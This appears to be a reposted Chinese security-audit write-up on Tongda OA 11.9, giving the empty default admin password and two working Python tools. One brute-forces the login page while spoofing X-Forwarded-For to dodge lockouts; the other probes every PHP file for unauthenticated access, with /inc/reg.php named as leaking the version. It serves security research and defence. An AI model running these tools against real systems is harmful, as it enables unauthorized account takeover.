通达oa 作为攻防演练中出场率较高的一套 OA 系统,决定先从历史漏洞开始挖掘分析,对通达oa 有一个初步的了解
通达 OA 11.9 的下载地址 默认安装路径是 D:\MYOA,联网状态下会自动更新到通达 OA 11.10
安装成功后,登录界面如下 默认账号为 admin 对应密码为空
import requests
import sys
import re
def read_passwd(passwordfile):
    """Return the lines of ``passwordfile`` as a list, without line terminators.

    ``str.splitlines`` is applied to the whole text, so blank lines are kept
    and a trailing newline does not produce an extra empty entry.  The file
    is opened with the platform default encoding, exactly as before.
    """
    with open(passwordfile) as handle:
        contents = handle.read()
    return contents.splitlines()
def Intruder_password(url,username,passwd_list):
    """Post every candidate in ``passwd_list`` to ``url``/logincheck.php for ``username``.

    Each request carries a different, synthetic ``X-Forwarded-For`` value (a
    counter walked octet by octet), so a login throttle that keys on the
    forwarded header rather than on the real peer address sees every attempt
    as a new client.  Defensive takeaways for the OA side: only honour
    ``X-Forwarded-For`` when it is set by a trusted reverse proxy, throttle
    per account as well as per source, and alert when a single TCP peer emits
    many distinct forwarded addresses in a short window.

    Prints one line per attempt, returns nothing, and does not stop after a
    successful match.
    """
    # Marker text the OA returns on a valid login.  It is handed to re.search as a
    # pattern, so the dots match any character; the literal text still matches.
    success_str ="正在进入OA系统,请稍候..."
    # The four octets of the fabricated forwarded address, all starting at 0.
    a=b=c=d=0
    url = url +"/logincheck.php"
    for passwd in passwd_list:
        payload ="UNAME={}&PASSWORD={}&encode_type=1".format(username,passwd)
        # A fresh X-Forwarded-For on every request; this rotation is what an
        # XFF-keyed lockout fails to see, and what a detection rule should key on.
        headers = { "X-Forwarded-For": "{}.{}.{}.{}".format(a,b,c,d),"Content-Type": "application/x-www-form-urlencoded"}
        response = requests.request("POST", url, data=payload, headers=headers)
        if(re.search(success_str, response.text)):
            print("正确的账号名:{}密码:{}".format(username,passwd))
        else:
            print("错误密码:{}".format(passwd))
        # Advance the counter: an octet wraps to 0 when it reaches 255 and carries
        # into the next one, so the emitted octets run 0..254.
        d=d+1
        if(d ==255):
            c = c +1
            d =0
            if(c ==255):
                b = b +1
                c =0
                if(b ==255):
                    a = a +1
                    b =0
def main():
    """Read ``targeturl username passwdfile`` from argv, load the list and run the check.

    Prints a usage message and exits when fewer than three arguments are given.
    """
    if len(sys.argv) <4:
        # NOTE(review): the "\n" between the two usage lines is restored here; the
        # pasted listing had lost the backslash ("passwdfilen").
        print("Usage: Intruder_password.py targeturl username passwdfile\n"
        "Example: python Intruder_password.py http://10.0.18.1:80 admin passwd.txt")
        exit()
    url = sys.argv[1]
    username = sys.argv[2]
    passwd_list = read_passwd(sys.argv[3])
    Intruder_password(url,username,passwd_list)
# Script entry point; nothing runs on plain import.
if __name__ == '__main__':
    main()
import os
import sys
import requests
def file_path(url,filefolder):
    """GET every ``.php`` file found under a local copy of the webroot at its URL below ``url``.

    Walks ``filefolder`` recursively, turns each local path into a URL by swapping
    the folder prefix for ``url`` and backslashes for slashes, requests it and
    prints status code, body length and URL.  Read as an exposure inventory: a
    script that is only meant to be included (or run once at install time) but
    answers 200 without a session is a candidate for access restriction at the web
    server; the write-up names ``/inc/reg.php`` as one that leaks version
    information.  Returns nothing.
    """
    for root, dirs, files in os.walk(filefolder):
        for f in files:
            paths = os.path.join(root,f)
            # os.walk yields roots that start with filefolder verbatim, so this
            # textual replace strips exactly that prefix and prepends the base URL.
            paths = paths.replace(filefolder,url)
            # NOTE(review): the escaped backslash is restored here; the pasted
            # listing read "\" which is not valid Python.
            paths = paths.replace("\\","/")
            #print(paths)
            if(f.endswith(".php")):
                response = requests.get(paths)
                # print(str(response.status_code)+" "+str(len(response.text))+" "+paths)
                print("code:"+str(response.status_code) +" len:"+str(len(response.text))+" url: "+ paths )
def main():
    """Read ``targeturl filefolder`` from argv and run the webroot probe.

    Prints a usage message and exits when fewer than two arguments are given.
    """
    if len(sys.argv) <3:
        # NOTE(review): the "\n" and the escaping of the quoted example path are
        # restored here; the pasted listing had dropped every backslash.
        print("Usage: file_path.py targeturl filefolder\n"
        "Example: python file_path.py http://10.0.18.1:80 \"C:\\Users\\admin\\Desktop\\MYOA\\webroot\"")
        exit()
    url = sys.argv[1]
    filefolder = sys.argv[2]
    file_path(url,filefolder)
# Script entry point; nothing runs on plain import.
if __name__ == '__main__':
    main()
http://10.0.18.1/inc/reg.php 泄露版本信息
链接:https://www.hetianlab.com/expc.do?ec=ECIDb9ac-4540-46b4-b676-22df36b5935b
原文始发于微信公众号(合天网安实验室):某OA 审计小记
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。